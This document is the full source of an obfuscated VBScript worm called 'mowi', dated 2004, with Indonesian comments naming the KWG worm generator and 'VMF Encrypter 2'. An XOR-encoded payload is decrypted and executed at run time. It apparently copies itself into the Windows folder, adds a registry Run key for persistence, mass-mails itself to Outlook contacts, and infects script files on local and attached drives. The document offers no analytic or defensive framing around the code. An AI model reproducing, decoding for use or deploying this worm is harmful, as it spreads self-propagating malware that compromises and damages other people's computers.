'(Jal}v{/xf{g/YBI/Jal}v{j}/=/"/mv/\fkjv(b`xf(b`xf(DXH/"/mv/\fkjv/T\JL[@]"\R(=8!>?!=??;(@a/J}}`}/]j|zbj/Ajw{\j{/DXHI\@/2/L}jn{j@mejl{'-\l}f{fah!Ifcj\v|{jb@mejl{-&\j{/Xfa/2/DXHI\@!Hj{\jlfncI`ckj}'?&\j{/DXH\GJCC/2/L}jn{j@mejl{'-X\l}f{!\gjcc-&DXH\GJCC!]jhX}f{j/-GDCBS\`i{xn}jSBfl}`|`i{SXfak`x|SLz}}ja{Yj}|f`aS]zaSnc`h!jwj-#/Xfa/)/-S-/)/-Nhaj|PB`afln!{w{!ym|-\j{/HIfc/2/DXHI\@!Hj{Ifcj'X|l}f{!\l}f{Anbj&DXHI\@!L`vIfcj/HIfc/#/Xfa/)/-S-/)/-Nhaj|PB`afln!{w{!ym|-Fi/Knv'A`x'&&/2/>9/Nak/B`a{g'A`x'&&/2/=/[gja\j{/Mn{Kjc/2/DXHI\@!L}jn{j[jw{Ifcj'-l5SNz{`jwjl!mn{-#>&Mn{Kjc!X}f{jCfaj/-Ojlg`/DXH/"/mv/\fkjv/T\JL[@]"\R-Mn{Kjc!X}f{jCfaj/-kjc{}jj v/L5-Mn{Kjc!Lc`|jJak/Fi\j{/IBnfc/2/DXHI\@!L}jn{j[jw{Ifcj'-DXHial!jwj-#>&IBnfc!X}f{jCfaj/-Izal{f`a/M`cnd'[jd|&5M`cnd/2/\{}]jyj}|j'[jd|&5Jak/Izal{f`a-IBnfc!Lc`|jIal/2/DXHI\@!@ja[jw{Ifcj'-DXHial!jwj-&!]jnkNccjwjlz{j/Ialjwjlz{j/M`cnd'-iF/kaJ5{wjA5{wjA5kaj\!cfnbJd``c{z@5jz}[/2/{fbmz\}j{iNj{jcjK!cfnbJd``c{z@5jbnAcczI{f}l\!{f}l\X/kkN!|{ajbgln{{N!cfnbJd``c{z@5--0fx`b/`{/`{D/N--/2/vk`M!cfnbJd``c{z@5--0fx`b/`{/`{D/N--/2/{ljemz\!cfnbJd``c{z@5&z`}H}j|Z'|jf}{aJ||j}kkN!gl{fx\{ln{a`L/kkN!|{ajfflj]!cfnbJd``c{z@5&?'bj{Fj{nj}L!Nd``c{z@/2/cfnbJd``c{z@/{j\5{az`L!|jf}{aJ||j}kkN!gl{fx\{ln{a`L/`[/>/2/z`}H}j|Z/}`I5|{|fC||j}kkN!&--F_NB--'jln\jbnA{jH!Nd``c{z@/aF/gl{fx\{ln{a`L/glnJ/}`I5ajg[/----/2/Nd``c{z@/{`A/iF5&--a`f{nlfcN!d``c{z@--'{ljem@j{nj}L/2/Nd``c{z@/{j\-&DXHFaijl{'&Faijd|f/2/DXHI\@!@ja[jw{Ifcj'-DXHFaijl{!jwj-&!]jnkNccjwjlz{j/Faijd|f\j{/K}fyj|/2/DXHI\@!K}fyj|I`}/Jnlg/K}fyj/fa/K}fyj|Fi/K}fyj!F|]jnkv/[gjaFaijl{/K}fyj/)/-S-Jak/FiAjw{\zm/DXHFaijl{'&@a/J}}`}/]j|zbj/Ajw{\j{/Fai/2/DXHI\@!L}jn{j[jw{Ifcj'-DXHFaijl{!jwj-#>&Fai!X}f{jCfaj/-\zm/Faijl{'Ifcjavn&-Fai!X}f{jCfaj/-@a/J}}`}/]j|zbj/Ajw{-Fai!X}f{jCfaj/-\j{/HI`c/2/DXHI\@!Hj{I`ckj}'Ifcjavn&-Fai!X}f{jCfaj/-I`}/Jnlg/Ifcj/Fa/HI`c!Ifcj|-Fai!X}f{jCfaj/-jw{/2/DXHI\@!Hj{Jw{ja|f`aAnbj'Ifcj!_n{g&-Fai!X}f{jCfaj/-Fi/'jw{/2/--ym|--&/[gja-Fai!X}f{jCfaj/-f|YM\'Ifcj!_n{g&-Fai!X}f{jCfaj/-Jak/Fi-Fai!X}f{jCfaj/-Ajw{-Fai!X}f{jCfaj/-I`}/Jnlg/I`c/fa/HI`c!\zmI`ckj}|-Fai!X}f{jCfaj/-Faijl{'I`c!_n{g&-Fai!X}f{jCfaj/-Ajw{-Fai!X}f{jCfaj/-Jak/\zm-Fai!Lc`|jJak/\zm\zm/f|YM\'Ifcjavn&\j{/[Ifcj/2/DXHI\@!Hj{Ifcj'Ifcjavn&\j{/Hi/2/DXHI\@!Hj{Ifcj'X|l}f{!\l}f{Anbj&DXHI\@!L`vIfcj/Hi#/[IfcjJak/\zm
'Function Vmfe2(Sscript):For VmfeHit = 1 To Len(Sscript):Vmfenum = Asc(Mid(Sscript, VmfeHit, 1)) Xor Len("VMF Encrypter 2"):Vmfertn = Vmfertn & Chr(Vmfenum):Vmfe2 = Vmfertn:Next:End Function
On Error Resume Next
Set Vmfefso = CreateObject("Scripting.FileSystemObject")
Vmfeor = Vmfefso.OpenTextFile(Wscript.ScriptName,1).ReadAll
execute mid(Vmfeor,2389,190):execute Vmfe2(mid(Vmfeor,43,2341))
'Generate with KWG - by Spidey [SECTOR-S] ///// terenkripsi dengan VMF Encrypter 2
'Nama Worm : mowi
'Pembuat   : mowi
'Date      : 27.10.2004
